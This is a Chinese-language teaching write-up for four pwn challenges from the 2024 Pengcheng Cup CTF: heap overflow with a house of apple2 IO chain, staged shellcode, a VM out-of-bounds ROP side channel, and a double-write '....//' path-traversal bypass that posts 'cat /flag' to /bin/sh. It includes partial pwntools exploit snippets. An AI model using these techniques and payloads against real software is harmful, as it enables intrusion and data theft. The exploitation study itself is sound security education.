2024鹏城杯Pwn方向题解教学文档<\/h3>

1. babyheap<\/h4>

题目分析<\/strong><\/p>

漏洞点：edit<\/code>函数固定长度为0x400<\/code>，存在堆溢出。<\/li>
环境：libc2.35<\/code>，需通过house of apple2<\/code>攻击IO<\/code>结构。<\/li>
利用步骤：泄露heap基址<\/strong>：通过add(0)<\/code>触发free<\/code>后重新分配，读取残留的堆地址。<\/li> 泄露libc基址<\/strong>：填满tcache<\/code>后释放到unsorted bin<\/code>，通过show<\/code>获取main_arena<\/code>地址。<\/li> 构造IO攻击链<\/strong>：利用edit<\/code>溢出修改_IO_2_1_stderr<\/code>的_wide_data<\/code>和vtable<\/code>，劫持控制流。<\/li> <\/ol> <\/li> <\/ul> 关键代码<\/strong><\/p> # 泄露heap基址<\/span> <\/span><\/span>add(0<\/span>, 0<\/span>, b<\/span>''<\/span>) # 触发free后残留heap地址<\/span> <\/span><\/span>show(0<\/span>) <\/span><\/span>heap_base =<\/span> u64(p.<\/span>recv(5<\/span>).<\/span>ljust(8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>)) <<<\/span> 12<\/span> <\/span><\/span> <\/span><\/span># 泄露libc基址<\/span> <\/span><\/span>for<\/span> i in<\/span> range(8<\/span>): add(i, 0xa0<\/span>, b<\/span>'a'<\/span>) # 填满tcache<\/span> <\/span><\/span>delete(7<\/span>) # 进入unsorted bin<\/span> <\/span><\/span>show(7<\/span>) <\/span><\/span>libc_base =<\/span> u64(p.<\/span>recvuntil('<\/span>\x7f<\/span>'<\/span>)[-<\/span>6<\/span>:].<\/span>ljust(8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>)) -<\/span> 0x21ace0<\/span> -<\/span> 0x100<\/span> <\/span><\/span> <\/span><\/span># 构造IO链<\/span> <\/span><\/span>payload =<\/span> p64(system_addr) +<\/span> p64(heap_base +<\/span> 0x8d0<\/span>) # 伪造_IO_FILE和_wide_data<\/span> <\/span><\/span>edit(0<\/span>, payload) # 溢出修改<\/span> <\/span><\/span><\/code><\/pre> 2. cool_book<\/h4> 题目分析<\/strong><\/p> 漏洞点：add<\/code>函数的idx<\/code>未严格校验，导致越界覆盖返回地址。<\/li> 利用步骤：覆盖返回地址<\/strong>：通过越界写入堆地址，劫持控制流。<\/li> 执行shellcode<\/strong>：堆内存可执行，但read<\/code>仅允许0x10<\/code>字节，需分阶段：第一阶段：写入短shellcode<\/code>调用read<\/code>读取更多数据。<\/li> 第二阶段：写入完整shellcode<\/code>（open\/read\/write flag<\/code>）。<\/li> <\/ul> <\/li> <\/ol> <\/li> <\/ul> 关键代码<\/strong><\/p> # 覆盖返回地址<\/span> <\/span><\/span>add(0x31<\/span>, 0x10<\/span>, asm('xor edi, edi; mov rdx, 0x1000; syscall'<\/span>)) # 越界写入<\/span> <\/span><\/span> <\/span><\/span># 第二阶段shellcode<\/span> <\/span><\/span>shellcode =<\/span> asm(shellcraft.<\/span>open('flag'<\/span>) +<\/span> shellcraft.<\/span>read(3<\/span>, 'rsp'<\/span>, 0x100<\/span>) +<\/span> shellcraft.<\/span>write(1<\/span>, 'rsp'<\/span>, 0x100<\/span>)) <\/span><\/span>p.<\/span>send(shellcode) <\/span><\/span><\/code><\/pre> 3. vm<\/h4> 题目分析<\/strong><\/p> 漏洞点： swapreg0<\/code>指令的idx2<\/code>未校验，导致寄存器越界读写。<\/li> malloc\/free<\/code>指令可操作堆内存。<\/li> <\/ul> <\/li> 利用步骤：泄露libc<\/strong>：释放大块到unsorted bin<\/code>，通过越界读取main_arena<\/code>地址。<\/li> 泄露栈地址<\/strong>：利用libc<\/code>的environ<\/code>变量获取栈地址，计算返回地址。<\/li> 侧信道爆破flag<\/strong>：通过ROP构造cmp<\/code>指令比较字符，利用非法地址访问崩溃特性判断字符是否正确。<\/li> <\/ol> <\/li> <\/ul> 关键ROP链<\/strong><\/p> # 侧信道核心逻辑<\/span> <\/span><\/span>mg1 =<\/span> libc_base +<\/span> 0x19244e<\/span> # cmp al, [rsi-1]; jne 0x1925c5<\/span> <\/span><\/span>mg2 =<\/span> libc_base +<\/span> 0x1142bb<\/span> # mov qword [rax], -1; xor eax, eax<\/span> <\/span><\/span>write_rop(char, idx): # 写入ROP比较flag字符<\/span> <\/span><\/span> # 构造open\/read\/cmp链<\/span> <\/span><\/span> # 若字符不匹配，触发mov [rax], -1（rax为非法地址）导致崩溃<\/span> <\/span><\/span><\/code><\/pre> 4. ez_upload<\/h4> 题目分析<\/strong><\/p> 漏洞点： handle_url<\/code>函数对..\/<\/code>的过滤可被....\/\/<\/code>绕过（双写绕过）。<\/li> bbbb<\/code>函数通过pipe<\/code>和dup2<\/code>重定向子进程输入，可执行任意命令。<\/li> <\/ul> <\/li> 利用步骤：目录穿越<\/strong>：通过....\/\/<\/code>绕过过滤，访问\/bin\/sh<\/code>。<\/li> 命令注入<\/strong>：POST<\/code>请求数据作为子进程输入，执行cat \/flag<\/code>。<\/li> <\/ol> <\/li> <\/ul> 关键请求<\/strong><\/p> requests.<\/span>post("http:\/\/target\/....\/\/....\/\/bin\/sh"<\/span>, data=<\/span>"cat \/flag<\/span>\n<\/span>"<\/span>) <\/span><\/span><\/code><\/pre> 总结<\/h3> 堆利用<\/strong>：关注libc2.35<\/code>的IO<\/code>攻击链构造（如house of apple2<\/code>）。<\/li> 沙盒绕过<\/strong>：侧信道需结合ROP<\/code>和崩溃行为分析。<\/li> Web与系统结合<\/strong>：httpd<\/code>类题目注意文件权限和路径穿越的复合利用。<\/li> <\/ul> 注<\/strong>：实际利用时需根据远程环境调整偏移量和gadget<\/code>。<\/p>